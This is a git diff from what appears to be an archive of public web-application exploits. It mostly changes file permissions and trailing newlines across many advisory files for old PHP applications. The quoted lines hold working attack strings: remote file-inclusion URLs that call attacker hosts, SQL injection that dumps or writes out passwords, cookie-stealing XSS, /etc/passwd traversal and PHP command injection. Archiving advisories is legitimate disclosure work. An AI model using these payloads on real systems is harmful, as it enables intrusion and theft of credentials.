newline at end of file +http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc \ No newline at end of file diff --git a/platforms/php/webapps/22318.txt b/platforms/php/webapps/22318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22336.txt b/platforms/php/webapps/22336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22339.txt b/platforms/php/webapps/22339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22343.txt b/platforms/php/webapps/22343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22347.txt b/platforms/php/webapps/22347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22348.txt b/platforms/php/webapps/22348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22349.txt b/platforms/php/webapps/22349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2235.txt b/platforms/php/webapps/2235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2236.txt b/platforms/php/webapps/2236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22372.txt b/platforms/php/webapps/22372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22373.txt b/platforms/php/webapps/22373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22374.txt b/platforms/php/webapps/22374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22378.txt b/platforms/php/webapps/22378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22382.txt b/platforms/php/webapps/22382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22383.txt b/platforms/php/webapps/22383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22385.txt b/platforms/php/webapps/22385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22386.txt b/platforms/php/webapps/22386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22387.txt b/platforms/php/webapps/22387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22389.txt b/platforms/php/webapps/22389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2239.txt b/platforms/php/webapps/2239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22391.txt b/platforms/php/webapps/22391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22392.txt b/platforms/php/webapps/22392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22393.txt b/platforms/php/webapps/22393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22396.txt b/platforms/php/webapps/22396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22398.php b/platforms/php/webapps/22398.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22399.txt b/platforms/php/webapps/22399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2240.txt b/platforms/php/webapps/2240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22403.txt b/platforms/php/webapps/22403.txt old mode 100755 new mode 100644 index e2062c095..c382782aa --- a/platforms/php/webapps/22403.txt +++ b/platforms/php/webapps/22403.txt @@ -61,6 +61,4 @@ Spider Catalog for Joomla! is a convenient tool for organizing the products repr _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/22405.txt b/platforms/php/webapps/22405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22411.txt b/platforms/php/webapps/22411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22412.txt b/platforms/php/webapps/22412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22413.txt b/platforms/php/webapps/22413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22414.php b/platforms/php/webapps/22414.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22421.txt b/platforms/php/webapps/22421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22422.txt b/platforms/php/webapps/22422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22423.txt b/platforms/php/webapps/22423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22424.txt b/platforms/php/webapps/22424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22427.txt b/platforms/php/webapps/22427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22429.txt b/platforms/php/webapps/22429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2243.php b/platforms/php/webapps/2243.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22430.txt b/platforms/php/webapps/22430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22431.txt b/platforms/php/webapps/22431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22438.txt b/platforms/php/webapps/22438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22439.txt b/platforms/php/webapps/22439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22443.txt b/platforms/php/webapps/22443.txt old mode 100755 new mode 100644 index 515fee154..38d9351b4 --- a/platforms/php/webapps/22443.txt +++ b/platforms/php/webapps/22443.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Guestbook that may allow remote attackers The vulnerability is likely due to insufficient permissions on the 'admin.php' script file. -http://hostname/guestbook/admin.php \ No newline at end of file +http://hostname/guestbook/admin.php \ No newline at end of file diff --git a/platforms/php/webapps/22444.txt b/platforms/php/webapps/22444.txt old mode 100755 new mode 100644 index f25685f82..8392b6252 --- a/platforms/php/webapps/22444.txt +++ b/platforms/php/webapps/22444.txt @@ -4,4 +4,4 @@ A path disclosure vulnerability has been reported for Guestbook. The issue occur Access to sensitive filesystem information may aid an attacker in launching further attacks against a target system -http://hostname/jgb_eng_php3/cfooter.php3 \ No newline at end of file +http://hostname/jgb_eng_php3/cfooter.php3 \ No newline at end of file diff --git a/platforms/php/webapps/22445.txt b/platforms/php/webapps/22445.txt old mode 100755 new mode 100644 index 18850fc05..c4d50a75e --- a/platforms/php/webapps/22445.txt +++ b/platforms/php/webapps/22445.txt @@ -4,4 +4,4 @@ A path disclosure vulnerability has been reported for ScozBook. The issue occurs Access to sensitive filesystem information may aid an attacker in launching further attacks against a target system. -http://hostname/scozbook/view.php?PG=test \ No newline at end of file +http://hostname/scozbook/view.php?PG=test \ No newline at end of file diff --git a/platforms/php/webapps/22451.txt b/platforms/php/webapps/22451.txt old mode 100755 new mode 100644 index d97599fa1..de4565f2e --- a/platforms/php/webapps/22451.txt +++ b/platforms/php/webapps/22451.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7262/info It has been reported that it is possible to inject script code into the subject of a message in Phorum. This may be done by constructing a malicious subject line (or other fields) before sending an email to the target victim. -"><script>alert("Vulnerable");</script> \ No newline at end of file +"><script>alert("Vulnerable");</script> \ No newline at end of file diff --git a/platforms/php/webapps/22457.txt b/platforms/php/webapps/22457.txt old mode 100755 new mode 100644 index 70d418e90..6fad2d7db --- a/platforms/php/webapps/22457.txt +++ b/platforms/php/webapps/22457.txt @@ -9,4 +9,4 @@ This attack may lead to confidential or sensitive information disclosure, which ~$ ln -s /etc/passwd /tmp/form.tpl ~$ ln -s /etc/passwd /tmp/box.tpl -http://www.example.com/index.php?template=../../../../tmp \ No newline at end of file +http://www.example.com/index.php?template=../../../../tmp \ No newline at end of file diff --git a/platforms/php/webapps/22459.txt b/platforms/php/webapps/22459.txt old mode 100755 new mode 100644 index 41c603377..b80e319ab --- a/platforms/php/webapps/22459.txt +++ b/platforms/php/webapps/22459.txt @@ -11,4 +11,4 @@ http://www.example.com/index.php?lng=../../../../tmp/p ~$ echo "<?php phpinfo() ?>" > /tmp/p.php -http://www.example.com/index.php?lng=../../../../tmp/p \ No newline at end of file +http://www.example.com/index.php?lng=../../../../tmp/p \ No newline at end of file diff --git a/platforms/php/webapps/22461.txt b/platforms/php/webapps/22461.txt old mode 100755 new mode 100644 index 369ec131a..565c83e83 --- a/platforms/php/webapps/22461.txt +++ b/platforms/php/webapps/22461.txt @@ -5,4 +5,4 @@ An input validation error has been reported in Invision Board which may result i An attacker may be able to exploit this vulnerability by manipulating some URI parameter to include malicious SQL commands and queries which may result in information disclosure, or database corruption. http://www.example.com/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id% -29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0 \ No newline at end of file +29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0 \ No newline at end of file diff --git a/platforms/php/webapps/22463.txt b/platforms/php/webapps/22463.txt old mode 100755 new mode 100644 index ed518ded3..154816a23 --- a/platforms/php/webapps/22463.txt +++ b/platforms/php/webapps/22463.txt @@ -92,6 +92,4 @@ be accompanied with an image. _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/2247.php b/platforms/php/webapps/2247.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22473.txt b/platforms/php/webapps/22473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22474.txt b/platforms/php/webapps/22474.txt old mode 100755 new mode 100644 index bb6ae801a..1d3373af6 --- a/platforms/php/webapps/22474.txt +++ b/platforms/php/webapps/22474.txt @@ -6,4 +6,4 @@ It has been reported that an input validation error exists in the login.php file http://www.example.org/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1 -This will save all user passwords to the file.txt file, which will be remotely accessible. \ No newline at end of file +This will save all user passwords to the file.txt file, which will be remotely accessible. \ No newline at end of file diff --git a/platforms/php/webapps/22477.txt b/platforms/php/webapps/22477.txt old mode 100755 new mode 100644 index bb58e48fd..8abdbfae6 --- a/platforms/php/webapps/22477.txt +++ b/platforms/php/webapps/22477.txt @@ -10,4 +10,4 @@ This vulnerability has been reported to affect phPay version 2.02. However, prev http://www.example.com/login.phpsess=your_session_id&abt=&new_lang=99999&caller=navlang -http://www.example.com/start.php?config=alper.inc.php \ No newline at end of file +http://www.example.com/start.php?config=alper.inc.php \ No newline at end of file diff --git a/platforms/php/webapps/22478.txt b/platforms/php/webapps/22478.txt old mode 100755 new mode 100644 index a50f1ab3d..c717b8ff9 --- a/platforms/php/webapps/22478.txt +++ b/platforms/php/webapps/22478.txt @@ -9,4 +9,4 @@ Any attacker-supplied code will be executed within the context of the website ru While this vulnerability has been reported to affect phPay version 2.02, previous versions may also be affected. http://www.example.com/search.php?sess=your_session_id&lookfor=<script>alert -(document.cookie)</script> \ No newline at end of file +(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2249.txt b/platforms/php/webapps/2249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22491.txt b/platforms/php/webapps/22491.txt old mode 100755 new mode 100644 index b75f62ded..d8ffaf33f --- a/platforms/php/webapps/22491.txt +++ b/platforms/php/webapps/22491.txt @@ -6,4 +6,4 @@ Exploitation may allow theft of cookie-based authentication credentials or other http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code] http://[target]/index.php/[any_section]/">[hostile_code]< -http://[target]/index.php/"><script>[hostile_code]< \ No newline at end of file +http://[target]/index.php/"><script>[hostile_code]< \ No newline at end of file diff --git a/platforms/php/webapps/22492.txt b/platforms/php/webapps/22492.txt old mode 100755 new mode 100644 index fcc066aac..a3ffae58d --- a/platforms/php/webapps/22492.txt +++ b/platforms/php/webapps/22492.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7349/info Several path disclosure vulnerabilities have been reported for eZ Publish. An attacker can exploit this vulnerability by making a HTTP request for any of the affected pages. This may result in a condition where path information is returned to the attacker. http://[target]/kernel/class/delete.php -http://[target]/kernel/classes/ezrole.php \ No newline at end of file +http://[target]/kernel/classes/ezrole.php \ No newline at end of file diff --git a/platforms/php/webapps/22498.txt b/platforms/php/webapps/22498.txt old mode 100755 new mode 100644 index edbf84d62..9b37f9021 --- a/platforms/php/webapps/22498.txt +++ b/platforms/php/webapps/22498.txt @@ -8,4 +8,4 @@ This attack may be used in conjunction with other attacks to disclose, what may It should be noted that although osCommerce version 2.2cvs was reported vulnerable, previous versions may also be affected. -http://www.example.com/oscommerce_installation/default.php/cPath/../../../../../ \ No newline at end of file +http://www.example.com/oscommerce_installation/default.php/cPath/../../../../../ \ No newline at end of file diff --git a/platforms/php/webapps/22501.txt b/platforms/php/webapps/22501.txt old mode 100755 new mode 100644 index c53742fef..3ca8ed8dd --- a/platforms/php/webapps/22501.txt +++ b/platforms/php/webapps/22501.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7365/info A vulnerability has been reported for Xonic.ru News. The problem occurs due to insufficient sanitization of user-supplied data to the 'script.php' file. As a result, it may be possible for an attacker to pass malicious PHP or shell commands in requests to a target server. All commands would be executed on the system with the privileges of the vulnerable application. -http://www.example.org/admin/script.php?data=script.php?data=<? system($cmd) ?> \ No newline at end of file +http://www.example.org/admin/script.php?data=script.php?data=<? system($cmd) ?> \ No newline at end of file diff --git a/platforms/php/webapps/22517.txt b/platforms/php/webapps/22517.txt old mode 100755 new mode 100644 index 7bb1054fb..3c3b202ec --- a/platforms/php/webapps/22517.txt +++ b/platforms/php/webapps/22517.txt @@ -4,4 +4,4 @@ It has been reported that OpenBB does not properly check input passed via the 'i http://www.example.com/index.php?CID=1%20<something> -where <something> represents a SQL query. \ No newline at end of file +where <something> represents a SQL query. \ No newline at end of file diff --git a/platforms/php/webapps/22519.txt b/platforms/php/webapps/22519.txt old mode 100755 new mode 100644 index dd9b23b84..38205bd84 --- a/platforms/php/webapps/22519.txt +++ b/platforms/php/webapps/22519.txt @@ -4,4 +4,4 @@ It has been reported that OpenBB does not properly check input passed via the 'b http://www.example.com/board.php?FID=2%20<something> -where <something> represents a SQL query. \ No newline at end of file +where <something> represents a SQL query. \ No newline at end of file diff --git a/platforms/php/webapps/22520.txt b/platforms/php/webapps/22520.txt old mode 100755 new mode 100644 index bf1aba734..7460a01b5 --- a/platforms/php/webapps/22520.txt +++ b/platforms/php/webapps/22520.txt @@ -4,4 +4,4 @@ It has been reported that OpenBB does not properly check input passed via the 'm http://www.example.com/member.php?action=profile&UID=1%20<something> -where <something> represents a SQL query. \ No newline at end of file +where <something> represents a SQL query. \ No newline at end of file diff --git a/platforms/php/webapps/22521.c b/platforms/php/webapps/22521.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22524.txt b/platforms/php/webapps/22524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2253.php b/platforms/php/webapps/2253.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22534.txt b/platforms/php/webapps/22534.txt old mode 100755 new mode 100644 index a4be7cee1..dc021495e --- a/platforms/php/webapps/22534.txt +++ b/platforms/php/webapps/22534.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7427/info A vulnerability has been reported for Truegalerie that may result in unauthorized administrative access. The vulnerability exists due to insufficient sanitization of some URI values. -http://[target]/admin.php?loggedin=1 \ No newline at end of file +http://[target]/admin.php?loggedin=1 \ No newline at end of file diff --git a/platforms/php/webapps/22539.txt b/platforms/php/webapps/22539.txt old mode 100755 new mode 100644 index 1e4673c69..bff7f87bc --- a/platforms/php/webapps/22539.txt +++ b/platforms/php/webapps/22539.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerability may allow a malicious Xoops user t java script:alert%28document.cookie%29 -The script code must be embedded within HTML <img> tags. \ No newline at end of file +The script code must be embedded within HTML <img> tags. \ No newline at end of file diff --git a/platforms/php/webapps/2254.txt b/platforms/php/webapps/2254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22543.txt b/platforms/php/webapps/22543.txt old mode 100755 new mode 100644 index 94f75192b..3dd38e7cd --- a/platforms/php/webapps/22543.txt +++ b/platforms/php/webapps/22543.txt @@ -8,4 +8,4 @@ This issue may be exploited to steal cookie-based authentication credentials fro Altough this vulnerability was reported to affect OneCenter ForumOne version 4.0, previous version may also be affected. -<img src=javascript:alert(document.cookie);> \ No newline at end of file +<img src=javascript:alert(document.cookie);> \ No newline at end of file diff --git a/platforms/php/webapps/22547.php b/platforms/php/webapps/22547.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22548.txt b/platforms/php/webapps/22548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2255.txt b/platforms/php/webapps/2255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22557.txt b/platforms/php/webapps/22557.txt old mode 100755 new mode 100644 index 182411c92..56a4b5a17 --- a/platforms/php/webapps/22557.txt +++ b/platforms/php/webapps/22557.txt @@ -10,4 +10,4 @@ This vulnerability was reported to affect Splatt Forum version 4.0, it is not cu Perform a search with the keywords: -<iframe src="http://www.example.com"> \ No newline at end of file +<iframe src="http://www.example.com"> \ No newline at end of file diff --git a/platforms/php/webapps/22558.txt b/platforms/php/webapps/22558.txt old mode 100755 new mode 100644 index ae280a49a..ccdb7b000 --- a/platforms/php/webapps/22558.txt +++ b/platforms/php/webapps/22558.txt @@ -10,4 +10,4 @@ It should be noted that although this vulnerability has been reported to affect # Typical text here <script>alert(document.cookie);</script> additional text here. -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/php/webapps/2256.txt b/platforms/php/webapps/2256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2257.txt b/platforms/php/webapps/2257.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22577.txt b/platforms/php/webapps/22577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22578.txt b/platforms/php/webapps/22578.txt old mode 100755 new mode 100644 index db315b2fd..1d7d10f24 --- a/platforms/php/webapps/22578.txt +++ b/platforms/php/webapps/22578.txt @@ -6,4 +6,4 @@ Successful exploitation will result in the execution of the attacker-supplied PH There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible. -http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php \ No newline at end of file +http://www.example.com/install.php?step=7&installdir=http://yourserver/Settings.php \ No newline at end of file diff --git a/platforms/php/webapps/22579.txt b/platforms/php/webapps/22579.txt old mode 100755 new mode 100644 index b2363afc1..40e88040d --- a/platforms/php/webapps/22579.txt +++ b/platforms/php/webapps/22579.txt @@ -4,4 +4,4 @@ An HTML injection issue has been reported which may lead to unauthorized code ex It has been reported that it is possible to inject HTML or script code into the subject and other fields of a message in Phorum. This may be done by including code in message fields before sending a message to the target victim. -<<b>script>alert(document.cookie);<<b>/script> \ No newline at end of file +<<b>script>alert(document.cookie);<<b>/script> \ No newline at end of file diff --git a/platforms/php/webapps/22589.txt b/platforms/php/webapps/22589.txt old mode 100755 new mode 100644 index 74196aa40..444e70869 --- a/platforms/php/webapps/22589.txt +++ b/platforms/php/webapps/22589.txt @@ -4,4 +4,4 @@ It has been reported that multiple input validation bugs exist in the Web_Links http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code> -where <our_code> represents attacker-supplied SQL code. \ No newline at end of file +where <our_code> represents attacker-supplied SQL code. \ No newline at end of file diff --git a/platforms/php/webapps/2259.txt b/platforms/php/webapps/2259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22590.txt b/platforms/php/webapps/22590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22595.txt b/platforms/php/webapps/22595.txt old mode 100755 new mode 100644 index 71c02599e..5f607b461 --- a/platforms/php/webapps/22595.txt +++ b/platforms/php/webapps/22595.txt @@ -5,4 +5,4 @@ A cross site scripting vulnerability has been reported for PHP-Nuke. Specificall This may allow for theft of cookie-based authentication credentials and other attacks. http://[victim]/modules.php?name=Your_Account&op=userinfo& -username=bla<script>alert(document.cookie)</script> \ No newline at end of file +username=bla<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/22597.txt b/platforms/php/webapps/22597.txt old mode 100755 new mode 100644 index d6ba8ee15..9ff969e4a --- a/platforms/php/webapps/22597.txt +++ b/platforms/php/webapps/22597.txt @@ -4,4 +4,4 @@ PHP-Nuke is reportedly prone to multiple SQL injection vulnerabilities in the Do http://www.example.com/modules.php?name=Downloads&d_op=getit&lid=2%20<our_code> -where <our_code> represents SQL code that can be injected. \ No newline at end of file +where <our_code> represents SQL code that can be injected. \ No newline at end of file diff --git a/platforms/php/webapps/22598.txt b/platforms/php/webapps/22598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22599.html b/platforms/php/webapps/22599.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22600.txt b/platforms/php/webapps/22600.txt old mode 100755 new mode 100644 index dfa48c46a..ccd58edec --- a/platforms/php/webapps/22600.txt +++ b/platforms/php/webapps/22600.txt @@ -6,4 +6,4 @@ The issue presents itself due to a lack of sufficient sanitization when checking An attacker may exploit this condition to bypass the Owl authentication system. -http://www.example.com/intranet/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC \ No newline at end of file +http://www.example.com/intranet/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC \ No newline at end of file diff --git a/platforms/php/webapps/22603.txt b/platforms/php/webapps/22603.txt old mode 100755 new mode 100644 index ad5f8d306..558f20148 --- a/platforms/php/webapps/22603.txt +++ b/platforms/php/webapps/22603.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for PHP-Proxima. The problem occurs in the aut It should be noted that all local files would be accessed with the privileges of user invoking PHP-Proxima. -http://www.target.org/autohtml.php?op=modload&mainfile=x&name=filename \ No newline at end of file +http://www.target.org/autohtml.php?op=modload&mainfile=x&name=filename \ No newline at end of file diff --git a/platforms/php/webapps/22605.txt b/platforms/php/webapps/22605.txt old mode 100755 new mode 100644 index 3452472fd..832f8ba46 --- a/platforms/php/webapps/22605.txt +++ b/platforms/php/webapps/22605.txt @@ -4,4 +4,4 @@ An SQL injection issue has been reported to affect OneOrZero Helpdesk. The error Successful exploitation could result in compromise of the OneOrZero Helpdesk site integrity. -http://www.example.com/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10 \ No newline at end of file +http://www.example.com/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10 \ No newline at end of file diff --git a/platforms/php/webapps/22607.txt b/platforms/php/webapps/22607.txt old mode 100755 new mode 100644 index 4b1cc544d..beeaf8fcf --- a/platforms/php/webapps/22607.txt +++ b/platforms/php/webapps/22607.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability has been reported for eZ publish. Specifica This may allow for theft of cookie-based authentication credentials and other attacks. -http://www.example.com/index.php/article/articleview/<img%20src="javascript:alert(document.cookie)"> \ No newline at end of file +http://www.example.com/index.php/article/articleview/<img%20src="javascript:alert(document.cookie)"> \ No newline at end of file diff --git a/platforms/php/webapps/2261.php b/platforms/php/webapps/2261.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22612.txt b/platforms/php/webapps/22612.txt old mode 100755 new mode 100644 index 86a5b8684..4fc6884e9 --- a/platforms/php/webapps/22612.txt +++ b/platforms/php/webapps/22612.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7625/info A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. -http://target/admin/templates/header.php?admin_root=http://attacker/ \ No newline at end of file +http://target/admin/templates/header.php?admin_root=http://attacker/ \ No newline at end of file diff --git a/platforms/php/webapps/22618.txt b/platforms/php/webapps/22618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2262.php b/platforms/php/webapps/2262.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22625.txt b/platforms/php/webapps/22625.txt old mode 100755 new mode 100644 index c6cd46063..4fe67f61e --- a/platforms/php/webapps/22625.txt +++ b/platforms/php/webapps/22625.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7651/info A vulnerability has been reported for SudBox Boutique. The problem occurs due to insufficient initialization of variables and may allow an unauthorized user to gain authenticate. Specifically, by making a malicious request to the login.php script it may be possible to authenticate as the administrative user. -http://www.example.org/admin/login.php?check=1&admin=1 \ No newline at end of file +http://www.example.org/admin/login.php?check=1&admin=1 \ No newline at end of file diff --git a/platforms/php/webapps/2263.txt b/platforms/php/webapps/2263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22632.txt b/platforms/php/webapps/22632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22641.txt b/platforms/php/webapps/22641.txt old mode 100755 new mode 100644 index 7a6e2f335..726eaf5f1 --- a/platforms/php/webapps/22641.txt +++ b/platforms/php/webapps/22641.txt @@ -4,4 +4,4 @@ It has been reported that BLNews is prone to a remote file include vulnerability This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected. -http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org \ No newline at end of file +http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org \ No newline at end of file diff --git a/platforms/php/webapps/22642.txt b/platforms/php/webapps/22642.txt old mode 100755 new mode 100644 index 89fcfbf53..0784cf43b --- a/platforms/php/webapps/22642.txt +++ b/platforms/php/webapps/22642.txt @@ -5,4 +5,4 @@ A vulnerability has been reported in Ultimate PHP Board. The problem is said to $ telnet www.target.org 80 Connected to www.target.org at 80 GET /board/index.php HTTP/1.0 -User-Agent: <? phpinfo(); ?> \ No newline at end of file +User-Agent: <? phpinfo(); ?> \ No newline at end of file diff --git a/platforms/php/webapps/22651.txt b/platforms/php/webapps/22651.txt old mode 100755 new mode 100644 index 2b4bdd39b..566fff21f --- a/platforms/php/webapps/22651.txt +++ b/platforms/php/webapps/22651.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in PostNuke Phoenix v0.723 and earlier. Spec Exploitation may allow for modification of SQL queries, resulting in information disclosure, or database corruption. -http://example.com/modules.php?op=modload&name=Glossary&file=index&page=`[SQL QUERY] \ No newline at end of file +http://example.com/modules.php?op=modload&name=Glossary&file=index&page=`[SQL QUERY] \ No newline at end of file diff --git a/platforms/php/webapps/22654.txt b/platforms/php/webapps/22654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22663.txt b/platforms/php/webapps/22663.txt old mode 100755 new mode 100644 index f2b025d8c..0e87f11e2 --- a/platforms/php/webapps/22663.txt +++ b/platforms/php/webapps/22663.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7705/info A vulnerability has been reported that could enable a member of the news system to create and access an administrative account. This is due to insufficient validation of data supplied to account editing input fields of Newsscript. -Peter<~>2 \ No newline at end of file +Peter<~>2 \ No newline at end of file diff --git a/platforms/php/webapps/22671.txt b/platforms/php/webapps/22671.txt old mode 100755 new mode 100644 index be9fc649c..3e5a219d8 --- a/platforms/php/webapps/22671.txt +++ b/platforms/php/webapps/22671.txt @@ -4,4 +4,4 @@ Shoutbox is prone to directory traversal attacks. The vulnerability exists due t An attacker can exploit this vulnerability by manipulating the value of the affected 'conf' URI parameter to obtain any files readable by the web server. -http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd \ No newline at end of file +http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/22672.txt b/platforms/php/webapps/22672.txt old mode 100755 new mode 100644 index e9655507d..ee827e372 --- a/platforms/php/webapps/22672.txt +++ b/platforms/php/webapps/22672.txt @@ -4,4 +4,4 @@ A remote file include vulnerability has been reported for Cafelog. Due to insuff If the remote file is a malicious PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the web server. -http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com \ No newline at end of file +http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com \ No newline at end of file diff --git a/platforms/php/webapps/22675.txt b/platforms/php/webapps/22675.txt old mode 100755 new mode 100644 index f27e746f3..116fd2cc1 --- a/platforms/php/webapps/22675.txt +++ b/platforms/php/webapps/22675.txt @@ -23,4 +23,4 @@ Content-Type: text/html; charset=iso-8859-1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -----------------header.txt -------------------------- \ No newline at end of file +----------------header.txt -------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/2268.php b/platforms/php/webapps/2268.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22684.txt b/platforms/php/webapps/22684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2269.txt b/platforms/php/webapps/2269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22693.txt b/platforms/php/webapps/22693.txt old mode 100755 new mode 100644 index 792ea41ee..c3852d409 --- a/platforms/php/webapps/22693.txt +++ b/platforms/php/webapps/22693.txt @@ -6,4 +6,4 @@ This issue may be exploited by an attacker to use the vulnerable host as an open <input type="hidden" name="recipient" value="user1@offsitedomain.(localdomain)co -m, user2@offsitedomain.(localdomain)com"> \ No newline at end of file +m, user2@offsitedomain.(localdomain)com"> \ No newline at end of file diff --git a/platforms/php/webapps/2270.php b/platforms/php/webapps/2270.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/22704.txt b/platforms/php/webapps/22704.txt old mode 100755 new mode 100644 index 03f7d6982..16a1c642c --- a/platforms/php/webapps/22704.txt +++ b/platforms/php/webapps/22704.txt @@ -10,4 +10,4 @@ http://www.example.com/modules/WebChat/out.php 